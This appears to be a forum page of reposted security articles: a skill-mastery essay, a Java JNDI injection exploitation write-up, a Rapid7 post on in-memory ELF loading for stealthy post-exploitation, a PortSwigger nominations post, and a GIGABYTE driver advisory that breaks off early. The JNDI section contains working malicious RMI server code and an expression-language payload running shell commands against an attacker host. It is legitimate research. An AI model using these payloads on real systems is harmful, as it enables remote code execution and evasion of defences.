Don’t focus on status: Don’t focus on proving yourself to others and showing off what you know. Instead, focus on teaching others what you have learned. Sharing your knowledge with others by, for example, writing blog posts is a great way of filling your gaps in understanding a subject. If your writing focuses on trying to explain a concept well to the biggest possible audience, you will develop your own understanding of the skill as well as learn how to explain complex topics to a broader audience.
But be careful: if you set out to show off and sound “smart” in your blog posts, you will end up leaving out important context, fail to admit how you overcame obstacles, and put others off while looking like a jerk.

Don’t pay much attention to what others think: If you focus too much on what others think of you, it will make you feel insecure and distract you from learning. Remember: in this stage you are still learning, and that’s okay; it doesn’t matter that you’re not an expert yet. If you instead set clear goals and have a sense that you are advancing, you will focus more on the quality of your work. This will also help you distinguish between constructive and malicious criticism.

Keep expanding your horizons: Exchange ideas with people from your industry and hang out in a hacker space or at a conference every now and then. These experiences and connections all contribute to your learning. Talk to people about your current projects and ask them about theirs rather than trying to show off.

Embrace the feeling of inferiority: If you feel like you already know something or have mastered it, you stop learning. Always assume that you are a beginner and that there’s more to learn. There’s always more to learn. A sense of superiority can make you fragile to criticism and too insecure to seek help or improve.

Trust the process: It takes time. Nobody masters a skill overnight. But this should motivate you rather than discourage you. After all, if mastering a skill were easy, the skill would have little value. Try to align your individual interests in a field to identify a niche that you can dominate.

Move toward resistance and pain, avoid the easy path: It is very human to avoid our own weaknesses, and so stretching our mind to its limits can feel uncomfortable. This leads most people to stay in familiar territory rather than advancing to new things. If you want to achieve mastery, you must instead follow the “resistance path”.
Pick challenges that are slightly above your skill level to help you advance. Avoid challenges that are either so far beyond your skill that they discourage you, or so far below it that they bore you and cause you to lose focus.

Get used to failure and embrace it as a critical part of learning: When a computer program malfunctions, it shows you that you need to improve it. Treat your own failures the same way: as opportunities for improvement. Failures make us tougher and show us how something doesn’t work. Failures are learning opportunities, giving you new experience to learn from.

Master the art (“what”) and the science (“how”) of everything you do: Get a full understanding of the skill, not just the tools or one narrow technique. It is totally okay to get familiar with all the tools Kali Linux has to offer, but your aim should be to understand the inner workings behind the techniques used by these tools. Don’t be afraid to “reinvent the wheel” by building your own versions of existing tools; this can also help you internalize a concept.

Advance through trial and error: Be curious! Try out new things! If you wonder whether something would work in practice, try it out and see. If it works, great. If not, you’ll have learned why it doesn’t work.

Stage 2: Creative-Active

The creative/active stage occurs after you’ve established a solid foundation in the skills of your chosen field. In this stage you combine these skills in new and more interesting ways. Unlike the apprenticeship stage, where you tried and learned pre-existing techniques, here you combine them to come up with your own and develop a unique style, executing your craft like nobody else. Some people try to jump straight into this stage and skip the apprenticeship stage. They usually fail, because inventing something new without knowing what’s already out there, or without a firm understanding of the basics of the skill, is very frustrating and difficult.
Often this aspect of mastery can seem scary. You are venturing into places where no tutorials exist and trying to use your skills in ways nobody else has before.

Stage 3: Mastery

The final stage is where all the hours of work finally pay off… Mastery!

To finally achieve mastery, you’ll need to learn how to manage distractions, how to reach flow, and how to embrace deep work, and recognize that it is deliberate practice, not just hours spent in front of a computer or a book, that determines how fast you will achieve mastery.

Motivation

Each of us knows what it is like to be distracted and unproductive. We often wait for motivation to strike and inspire us to start our project. But we don’t have to wait for motivation to appear out of nowhere; we can induce it. In my experience, motivation happens when we start with action, which in turn sparks inspiration, and this inspiration gives us motivation to go further in a self-reinforcing loop.

Even once we are motivated to act, it is easy to tinker around without direction or become distracted by social media and phone notifications. If we allow ourselves to get distracted, time passes quickly but we don’t get much done. Managing and minimizing distractions is therefore critical to achieving flow and making the best use of our time.

Flow

I covered the concepts of flow and deep work in more detail in my blog post The Importance of Deep Work. Flow is the momentum you reach when you are fully focused on a task and everything seems to flow effortlessly. Flow can be quite addictive. Those who have experienced it know that it feels like a meditative state of productivity. It feels calming and gives you a sense of purpose.
This rewarding feeling of flow is best described by psychologist Mihaly Csikszentmihalyi:

“The best moments usually occur when a person’s body or mind is stretched to its limits in a voluntary effort to accomplish something difficult and worthwhile.” — Mihaly Csikszentmihalyi

The 25-minute Rule

In a study from the University of California, Irvine, researchers examined the costs of interrupted work. According to the study, it takes an average of 23 minutes and 15 seconds to get back to a task after being interrupted. Interrupted work also caused participants to experience higher levels of stress, frustration, and mental exhaustion. A good rule of thumb is that it takes about 25 minutes of undistracted focus to reach a state of flow. This means that if you’re checking your phone notifications every 20 minutes, you will never reach this state.

Apps are designed to keep us in front of our screens as much as possible. It’s a battle for attention; a cascading waterfall of notifications. We unlock our phones 80 times per day on average. New versions of Android and iOS have a “Screen Time” feature that shows you statistics on how much time you spend staring at your screen, which apps you use the most, and how many times you unlock your phone. Check it out: you might be surprised how much time and focus apps are draining from you each day. Even if we know how much time we waste on our phones, it can still be difficult to fight it and focus on what is important. To help, I will cover some of the apps that keep me focused at the end of this blog post.

Deep Work

In Deep Work: Rules for Focused Success in a Distracted World, Newport defines deep work as:

“Professional activities performed in a state of distraction-free concentration that push your cognitive capabilities to their limit. These efforts create new value, improve your skills, and are hard to replicate.”
“Deep work is hard and shallow work is easier and in the absence of clear goals for your job, the visible busyness that surrounds shallow work becomes self-preserving.” — Cal Newport

In his research, Newport discovered that high-performing students follow this rule:

Work Accomplished = Time Spent x Intensity

This rule is why some students spend all night studying and still struggle, whereas others easily outperform them. I wish I had understood this rule when I was an undergraduate during exams. Only later did I realize that time spent “studying” doesn’t make much difference if that time is not high-intensity. Once I understood this, I could avoid all-nighters and accomplish far more in much less time.

The secret is to systematically increase the intensity of your focus by experimenting with various techniques that fit your specific lifestyle and brain. My approach is to split my projects into deep work sessions. I make a list of things I want to accomplish and focus on the task for 90-120 minute periods, followed by a short break, and then repeat. You’d be amazed how much you can get done in a 4-hour block of uninterrupted work.

Deliberate practice is purposeful, systematic, and stretches your mind to its limits. It requires focused attention and is performed with the goal of improving performance. Regular practice is basically mindless repetition of the same task. The more we repeat a task, the more mindless it becomes. Mindless activity is the enemy of deliberate practice. You need to get used to failure and embrace it as a critical part of learning.

Productivity Apps

Devices are usually the source of our distractions, but there are a few apps we can use to help increase productivity. Here are some of my favorite apps for reducing distractions while working:

Screen Time: If you have an iPhone, use this feature! It tells you the unvarnished truth about your app use.
You can set limits on specific apps or categories of apps, like social media. Once you reach the limit, the apps are disabled, and you can re-enable access for another 15 minutes each time you hit the limit. Personally, I limit social media access to 30 minutes per day when I’m not traveling.

Trello: I use Trello boards to manage and plan my projects. Trello lets you create project boards and to-do lists, set deadlines, and so on. One of my boards serves as my weekly to-do list and is called “Weekly”. For individual projects I use boards listing the different project stages, with a to-do list for each. Your project to-do list doesn’t need to detail your entire plan right from the start. Your first project to-do list should instead contain small steps to get the project started. Make it as small as possible, listing 10 items or so. This will help you get started and progress step-by-step without getting stuck on what to do next. As you work through your to-do list you will come up with more items and can add them as you go. Try to create to-do list items that represent clear instructions for what to do next, so that whenever you look at the list you know exactly how to proceed.

For example, suppose you need to prepare a presentation. A to-do list containing items like “create outline”, “create all graphics”, “create slides”, and “finish slides” is too abstract, and you might spend too much time splitting the task up in your head and forgetting what to do next. A better approach is to split each step into small tasks, such as the following:

- Create outline
- Map out the different sections
- Map out the different subsections
- Create graphic for slide X
- Create graphic for slide Y

Forest: This is my favorite app, as it is both simple and useful. Whenever I decide to focus on a task for an hour or two, I set my Forest timer and hit “plant” to plant a tree of my choosing. If you switch to another app while the tree is growing, the tree dies.
If you manage to avoid switching apps until your period of focus is done, you earn a tree and points that can be spent on new types of trees and bushes for your Forest garden. The app is very simple and has the psychological effect of rewarding you for remaining undistracted. It helps make focus a habit and teaches your brain that it’s time to ignore distractions and focus as soon as you press the “plant” button.

Make Deep Work a Habit

Don’t just do deep work every now and then. Make it a habit! You need to choose a strategy/philosophy that fits your specific circumstances, as a mismatch can derail your deep work habit before it has a chance to solidify. Here are some strategies from the book Deep Work: Rules for Focused Success in a Distracted World:

Monastic: “This philosophy attempts to maximize deep efforts by eliminating or radically minimizing shallow obligations.” — Isolate yourself for long periods of time without distractions; no shallow work allowed.

Bimodal: “This philosophy asks that you divide your time, dedicating some clearly defined stretches to deep pursuits and leaving the rest open to everything else.” — Dedicate a few consecutive days (a weekend or a Sunday, for example) to deep work only, at least one day a week.

Rhythmic: “This philosophy argues that the easiest way to consistently start deep work sessions is to transform them into a simple regular habit.” — Create a daily habit of three to four hours of deep work on your project.

Journalistic: “...in which you fit deep work wherever you can into your schedule.” — Not recommended as a starting point, since you first need to accustom yourself to deep work.

Book Recommendations

If you are serious about mastering a skill in your field, I recommend getting some context by reading books that provide practical knowledge and put you in the right mindset. Here are some books I highly recommend, ordered by usefulness and importance.
- Mastery – Robert Greene
- Deep Work – Cal Newport
- The Subtle Art of Not Giving a Fuck – Mark Manson
- The Power of Habit – Charles Duhigg
- Atomic Habits – James Clear
- The Paradox of Choice – Barry Schwartz

Sursa: https://azeria-labs.com/the-process-of-mastering-a-skill/
-
Exploiting JNDI Injections in Java

By Michael Stepankin

Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS).

In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

When the name of the requested object is controlled by an attacker, it is possible to point a victim Java application to a malicious rmi/ldap/corba server and respond with an arbitrary object. If this object is an instance of the "javax.naming.Reference" class, a JNDI client tries to resolve the "classFactory" and "classFactoryLocation" attributes of this object. If the "classFactory" value is unknown to the target Java application, Java fetches the factory's bytecode from the "classFactoryLocation" location by using Java's URLClassLoader.

Due to its simplicity, this is very useful for exploiting Java vulnerabilities even when the 'InitialContext.lookup' method is not directly exposed to the tainted data. In some cases, it can still be reached via Deserialisation or Unsafe Reflection attacks.

Example of the vulnerable app:

@RequestMapping("/lookup")
@Example(uri = {"/lookup?name=java:comp/env"})
public Object lookup(@RequestParam String name) throws Exception{
    return new javax.naming.InitialContext().lookup(name);
}

Exploiting JNDI injections before JDK 1.8.0_191

By requesting the "/lookup/?name=ldap://127.0.0.1:1389/Object" URL, we can make the vulnerable server connect to our controlled address.
To trigger remote class loading, a malicious RMI server can respond with the following Reference:

public class EvilRMIServer {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);

        //creating a reference with 'ExportObject' factory with the factory location of 'http://_attacker.com_/'
        Reference ref = new javax.naming.Reference("ExportObject","ExportObject","http://_attacker.com_/");
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

Since "ExportObject" is unknown to the target server, its bytecode will be loaded and executed from "http://_attacker.com_/ExportObject.class", triggering an RCE.

This technique worked well up to Java 8u121, when Oracle added codebase restrictions to RMI. After that, it was possible to use a malicious LDAP server returning the same reference, as described in the "A Journey from JNDI/LDAP manipulation to remote code execution dream land" research. A good code example may be found in the 'Java Unmarshaller Security' GitHub repository.

Two years later, in the Java 8u191 update, Oracle put the same restrictions on the LDAP vector and issued CVE-2018-3149, closing the door on JNDI remote classloading. However, it is still possible to trigger deserialisation of untrusted data via JNDI injection, but its exploitation highly depends on the existing gadgets.

Exploiting JNDI injections in JDK 1.8.0_191+

Since Java 8u191, when a JNDI client receives a Reference object, its "classFactoryLocation" is not used, either in RMI or in LDAP. On the other hand, we can still specify an arbitrary factory class in the "javaFactory" attribute. This class will be used to extract the real object from the attacker-controlled "javax.naming.Reference".
It should exist in the target classpath, implement "javax.naming.spi.ObjectFactory", and have at least a "getObjectInstance" method:

public interface ObjectFactory {
    /**
     * Creates an object using the location or reference information
     * specified.
     * ...
     */
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?,?> environment) throws Exception;
}

The main idea was to find a factory in the target classpath that does something dangerous with the Reference's attributes. Looking at the different implementations of this method in the JDK and popular libraries, we found one that seems very interesting in terms of exploitation. The "org.apache.naming.factory.BeanFactory" class within Apache Tomcat Server contains logic for bean creation by using reflection:

public class BeanFactory implements ObjectFactory {

    /**
     * Create a new Bean instance.
     *
     * @param obj The reference object describing the Bean
     */
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?,?> environment)
        throws NamingException {

        if (obj instanceof ResourceRef) {
            try {
                Reference ref = (Reference) obj;
                String beanClassName = ref.getClassName();
                Class<?> beanClass = null;
                ClassLoader tcl = Thread.currentThread().getContextClassLoader();
                if (tcl != null) {
                    try {
                        beanClass = tcl.loadClass(beanClassName);
                    } catch(ClassNotFoundException e) {
                    }
                } else {
                    try {
                        beanClass = Class.forName(beanClassName);
                    } catch(ClassNotFoundException e) {
                        e.printStackTrace();
                    }
                }
                ...
                BeanInfo bi = Introspector.getBeanInfo(beanClass);
                PropertyDescriptor[] pda = bi.getPropertyDescriptors();

                Object bean = beanClass.getConstructor().newInstance();

                /* Look for properties with explicitly configured setter */
                RefAddr ra = ref.get("forceString");
                Map<String, Method> forced = new HashMap<>();
                String value;

                if (ra != null) {
                    value = (String)ra.getContent();
                    Class<?> paramTypes[] = new Class[1];
                    paramTypes[0] = String.class;
                    String setterName;
                    int index;

                    /* Items are given as comma separated list */
                    for (String param: value.split(",")) {
                        param = param.trim();
                        /* A single item can either be of the form name=method
                         * or just a property name (and we will use a standard
                         * setter) */
                        index = param.indexOf('=');
                        if (index >= 0) {
                            setterName = param.substring(index + 1).trim();
                            param = param.substring(0, index).trim();
                        } else {
                            setterName = "set" +
                                param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
                                param.substring(1);
                        }
                        try {
                            forced.put(param,
                                beanClass.getMethod(setterName, paramTypes));
                        } catch (NoSuchMethodException|SecurityException ex) {
                            throw new NamingException
                                ("Forced String setter " + setterName +
                                 " not found for property " + param);
                        }
                    }
                }

                Enumeration<RefAddr> e = ref.getAll();

                while (e.hasMoreElements()) {
                    ra = e.nextElement();
                    String propName = ra.getType();

                    if (propName.equals(Constants.FACTORY) ||
                        propName.equals("scope") || propName.equals("auth") ||
                        propName.equals("forceString") ||
                        propName.equals("singleton")) {
                        continue;
                    }

                    value = (String)ra.getContent();

                    Object[] valueArray = new Object[1];

                    /* Shortcut for properties with explicitly configured setter */
                    Method method = forced.get(propName);
                    if (method != null) {
                        valueArray[0] = value;
                        try {
                            method.invoke(bean, valueArray);
                        } catch (IllegalAccessException|
                                 IllegalArgumentException|
                                 InvocationTargetException ex) {
                            throw new NamingException
                                ("Forced String setter " + method.getName() +
                                 " threw exception for property " + propName);
                        }
                        continue;
                    }
                    ...
The "BeanFactory" class creates an instance of an arbitrary bean and calls its setters for all properties. The target bean class name, attributes, and attribute values all come from the Reference object, which is controlled by an attacker. The target class should have a public no-argument constructor and public setters with only one "String" parameter. In fact, these setters may not necessarily start with 'set', as "BeanFactory" contains some logic that lets us specify an arbitrary setter name for any parameter:

/* Look for properties with explicitly configured setter */
RefAddr ra = ref.get("forceString");
Map<String, Method> forced = new HashMap<>();
String value;

if (ra != null) {
    value = (String)ra.getContent();
    Class<?> paramTypes[] = new Class[1];
    paramTypes[0] = String.class;
    String setterName;
    int index;

    /* Items are given as comma separated list */
    for (String param: value.split(",")) {
        param = param.trim();
        /* A single item can either be of the form name=method
         * or just a property name (and we will use a standard
         * setter) */
        index = param.indexOf('=');
        if (index >= 0) {
            setterName = param.substring(index + 1).trim();
            param = param.substring(0, index).trim();
        } else {
            setterName = "set" +
                param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
                param.substring(1);
        }

The magic property used here is "forceString". By setting it, for example, to "x=eval", we can make a method call with the name 'eval' instead of 'setX' for the property 'x'.

So, by utilising the "BeanFactory" class, we can create an instance of an arbitrary class with a default constructor and call any public method with one "String" parameter. One of the classes that may be useful here is "javax.el.ELProcessor". In its "eval" method, we can specify a string that will represent a Java expression language template to be executed:

package javax.el;
...
public class ELProcessor {
    ...
    public Object eval(String expression) {
        return getValue(expression, Object.class);
    }

And here is a malicious expression that executes an arbitrary command when evaluated:

{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()")}

Chaining all things together

After the patch, there is almost no difference between LDAP and RMI for exploitation purposes, so for simplicity we will use RMI. We write our own malicious RMI server that responds with a crafted "ResourceRef" object:

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);

        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

This server responds with a serialized 'org.apache.naming.ResourceRef' object, with all attributes crafted to trigger the desired behaviour on the client. Then we trigger JNDI resolution on the victim Java process:

new InitialContext().lookup("rmi://127.0.0.1:1097/Object")

Nothing undesirable happens when this object is deserialised. But since it still extends "javax.naming.Reference", the "org.apache.naming.factory.BeanFactory" factory will be used on the victim's side to get the 'real' object from the Reference. At this stage, remote code execution via template evaluation will be triggered and the 'nslookup jndi.s.artsploit.com' command will be executed.

The only limitation here is that the target Java application should have the "org.apache.naming.factory.BeanFactory" class from Apache Tomcat Server in its classpath, but other application servers may have their own object factories with dangerous functionality inside.

Solution

The actual problem here is not within the JDK or the Apache Tomcat library, but rather in custom applications that pass user-controllable data to the "InitialContext.lookup()" function, as it still represents a security risk even on fully patched JDK installations. Keep in mind that other vulnerabilities (such as 'Deserialisation of untrusted data', for example) may also lead to JNDI resolution in many cases. Preventing these vulnerabilities through source code review is always a good idea.

Sursa: https://www.veracode.com/blog/research/exploiting-jndi-injections-java
-
Santa's ELFs: Running Linux Executables Without execve

Adam Cammack
Jan 03, 2019

This blog is the 11th post in our annual 12 Days of HaXmas blog series.

Merry HaXmas! Now that the holidays are winding down, Santa's elves can finally get some much-needed rest after working tirelessly on dolls, wooden trains, and new copies of Fortnite. Santa's ELFs, however, do not get such a break, since the Executable and Linkable Format (ELF) is the base of numerous Unix-like operating systems such as Linux, most modern BSDs, and Solaris. ELF files are capable of many tricks, like those we use in our *nix Meterpreter implementation, but those tricks require building each executable either with our special toolchain or with GCC 8+ and the new -static-pie flag. What if things were different? The kernel doesn't need a file on disk to load and run code, even if it makes us have one. Surely with some HaXmas magic and elbow grease we can do it ourselves.

Handcrafted mirrors

Perhaps the most-desired trick for executable formats is reflective loading. Reflective loading is an important post-exploitation technique used to avoid detection and execute more complex tools in locked-down environments. It generally has three broad steps:

1. Get code execution (e.g., exploitation or phishing)
2. Grab your own code from somewhere
3. Convince the operating system to run your code without loading it like a normal process

That last part is what makes reflective loading desirable. Environments are increasingly locked down, and the components of a normal process start are the most obvious targets. Traditional antivirus scans things on the disk, code signing checks integrity as new processes start, and behavioral monitoring keeps checking to make sure none of those processes start doing anything too weird. The thought is, if attackers can't run any programs, they can't do anything and the system is secure. This is not entirely correct; blocking the most obvious paths just makes things painful.
In particular, Windows, which uses the Portable Executable (PE) format, has seen much research into this topic, both because it is widely deployed and because it has useful reflection building blocks built into the core operating system. In fact, it has the gold standard API for this sort of work, CreateRemoteThread and friends, which allows attackers to not merely load, but inject code into other running processes.

Despite lacking fun APIs for reflective injection like CreateRemoteThread found in Windows, the last few years have seen some interesting research into unorthodox ways of using developer-focused Linux features to make their own security-focused lives better. A good summary of command-only approaches can be found here, and other techniques that require helper files include tools such as linux-inject. A more modern technique that can be executed from a helper binary or scripting language uses some new-ish syscalls. These approaches on Linux can be grouped into five categories:

- Writing to temporary files: This is not too different from typical code, but it doesn't leave disk artifacts.
- Injecting with ptrace: This requires some sophistication to control and classically allows broad process-hopping.
- Self-modifying executables: dd is a classic for this, and it requires a bit of finesse and customized shellcode.
- FFI integration in scripting languages: Python and Ruby are both suitable, current techniques that only load shellcode.
- Creating non-filesystem temporary files: This uses syscalls added in 2014, so it's approaching broad usability.

Strict working conditions

Few people closely watch their Linux boxes (congratulations if you do!), but these technique styles have security/opsec considerations in addition to their respective technical challenges alluded to above.
If you are on the bluer end of the security spectrum, think of the following as ways to frustrate any remote attackers lucky enough to compromise something:

Temporary files

It is increasingly common to find /tmp and /dev/shm mounted noexec (that is, no file in that tree can be executed), especially on mobile and embedded systems. Speaking of embedded systems, those often have read-only persistent file storage as well, so you can't even fall back to hoping no one is looking at the disk.

Self-modifying executables and ptrace

Access to ptrace and most of the fun introspection in /proc/<PID> is governed by the kernel.yama.ptrace_scope sysctl variable. On boxes that are not being used for development, it should be set to at least 2 to remove access from non-privileged users. This is the default on many mobile and embedded systems, and modern desktop/server distros default to at least 1, which reduces its usefulness for wildly hopping across processes. Also, it's Linux-specific, so no sweet, sweet BSD shells for you.

FFI integrations

Ruby's fiddle and Python's ctypes specifically are very flexible, and for a lot of small things they can function like an interpreted C. They don't have an assembler, though, so any detail work with registers or bootstrapping into different executables will need to be done with shellcode from your end. You also never know which version, if any, is going to be installed on a given system.

Non-filesystem temporary files

Also Linux-specific, this calls a pair of new syscalls that together can bypass any noexec flags I have been able to muster (tested through kernel 4.19.10). The first syscall is memfd_create(2). Added in 3.17, it allocates a new temporary filesystem with default permissions and creates a file inside it that does not show up in any mounted filesystem except /proc. The second syscall, added in 3.19, is execveat(2). It can take a file descriptor and pass it to the kernel for execution.
The downside is that the created file can easily be found with find /proc/*/fd -lname '/memfd:*', since all the memfd_create(2) files are represented as symbolic links with a constant prefix. This feature is rarely used in common software; the only legitimate example I can find on my Linux boxen was added to PulseAudio in 2016.

A (runtime) linker to the past

And then there's the big bottleneck: To run other programs, all these techniques use the standard execve(2) (or the related execveat(2) call in that last case). The presence of tailored SELinux profiles or syscall auditing could easily render them off-limits, and on recent SELinux-enforcing Android builds, it does. There is another technique, called userland exec or ul_exec, that mimics how the kernel initializes a process during an execve before handing control off to the runtime linker: ld.so(8). This is one of the earliest techniques in this field, pioneered by the grugq, though it's never been much pursued because it is a bit fiddly compared to the techniques above. There was an update and rewrite for x86_64, but it implements its own standard library, making it difficult to extend and unable to compile with modern stack-smashing protection.

The Linux world is very different from what it was nearly 15 years ago when this technique was first published. In the modern day, with 40+ bits of address space and position-independent executables by default, cobbling together the execve process is more straightforward. Sure, we can't hardcode the stack address and have it work >90% of the time, but programs don't rely on it being constant anymore, either, so we can put it nearly anywhere and do less juggling with memory addresses. Linux environments are now also more common, valuable, and closely guarded than in 2004, so going through the effort is worth it in some scenarios.
Process

There are still two requirements for emulating the work of execve that are not a given all the time, depending on execution method and environment. First, we require page-aligned memory allocation and the ability to mark the memory executable after we populate it. Because it is required for JITs, the built-in library loader dlopen(3), and some DRM implementations, this capability is difficult to completely remove from a system. However, SELinux can restrict executable memory allocation, and some more self-contained platforms like Android use these restrictions to good effect on things that are not approved browsers or DRM libraries. Next, we require the ability to arbitrarily jump into said memory. Trivial in C or shellcode, it does require a full FFI interface in a scripting language and rules out a non-XS Perl implementation, for example.

The process detailed by the grugq has changed in subtle but interesting ways. Even with all the development that has taken place, the overall steps are the same as before. One security feature of the modern GNU/Linux userland is that it is less concerned with particular memory addresses, which gives us more flexibility to implement our other kind of security feature. There are also more hints that the kernel passes to the runtime in the auxiliary vector; finding the original is now more desirable, but most programs can work fine with a simple one on most architectures.

The tool

The downfall of many tools, especially in open source and security, is staleness. With execve emulation left aside for other loading methods, the two ul_exec implementations have gotten little interest and (as best as I can tell) few updates from their authors. Our Linux Meterpreter implementation currently lacks support for the popular -m option to the execute command that, on Windows, runs a process completely in-memory under the guise of a benign program.
Using this and a fallback technique or two from above would give us the capabilities that we need to run uploaded files from memory and, with a little trickery, such as mapping extra benign files or changing the process name before handing control over to the uploaded executable, completely replicate -m. A nice side effect is that this will also make building and distributing plugins easier, as they will no longer need to be made into a memory image at build time.

To enable this, I am creating a shared library that will live alongside our Linux Meterpreter, mettle. It won't depend on any of the Meterpreter code, but by default, it will build with its toolchain. It will also be free and packageable into whatever post-exploitation mechanism you desire. Be sure to check out the pull request if you have any questions or suggestions.

Here we can see an example tool that uses this library in action, as viewed through the microscope of the syscall tracer strace(1). To avoid all the output associated with normal tracing, we are just using the %process trace expression to view only calls associated with the process life cycle, like fork, execve, and exit. On x86_64, the %process expression also grabs the arch_prctl syscall, which is only used on x86_64 and only for setting up thread-local storage. The execve is from strace starting the executable, and the first pair of arch_prctl calls is from the library initialization. Then nothing until the target starts up with its own pair of arch_prctl calls and prints out our message.

$ strace -e trace=%process ./noexec $(which cat) haxmas.txt
execve("./noexec", ["./noexec", "/usr/bin/cat", "haxmas.txt"], 0x7ffdcbdf0bc0 /* 23 vars */) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa750dd20) = -1 EINVAL (Invalid argument)
arch_prctl(ARCH_SET_FS, 0x7f17ca7db540) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa750dd20) = -1 EINVAL (Invalid argument)
arch_prctl(ARCH_SET_FS, 0x7f17ca7f3540) = 0
Merry, HaXmas!
exit_group(0) = ?
+++ exited with 0 +++

Putting a bow on it

With this new library as part of Mettle, we hope to provide a long-term, stealthy way of reliably loading programs on compromised Linux boxes. If you have questions or suggestions, be sure to check out the progress of my pull request, our *nix payload, or join us on Slack.

Sursa: https://blog.rapid7.com/2019/01/03/santas-elfs-running-linux-executables-without-execve/
-
Top 10 web hacking techniques of 2018 - nominations open
James Kettle | 03 January 2019 at 14:43 UTC

Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity.

As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we'll do this in three phases:

Jan 1st: Start to collect community nominations
Jan 21st: Launch community vote to build shortlist of top 15
Feb 11th: Panel vote on shortlist to select final top 10

Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they're affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research.

To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years' top 10 to get an idea of what people feel constitutes great research. You can find previous years' results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17.

Nominations so far

Here are the nominations so far.
We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts.

How I exploited ACME TLS-SNI-01 issuing Let's Encrypt SSL-certs for any domain using shared hosting
Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog
EdOverflow | An analysis of logic flaws in web-of-trust services.
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf
Scratching the surface of host headers in Safari
RCE by uploading a web.config – 003Random's Blog
Security: HTTP Smuggling, Apsis Pound load balancer | RBleug
Piercing the Veil: Server Side Request Forgery to NIPRNet access
inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra
inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra
inputzero: An untold story of skype by microsoft | Dhiraj Mishra
Neatly bypassing CSP – Wallarm
Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf
Beyond XSS: Edge Side Include Injection :: GoSecure
GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution
Logically Bypassing Browser Security Boundaries - Speaker Deck
Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out

James Kettle
@albinowax

Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
-
GIGABYTE Drivers Elevation of Privilege Vulnerabilities

1. Advisory Information

Title: GIGABYTE Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0007
Advisory URL: http://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Gigabyte
Release mode: User release

2. Vulnerability Information

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

3. Vulnerability Description

GIGABYTE's website states that[1]:

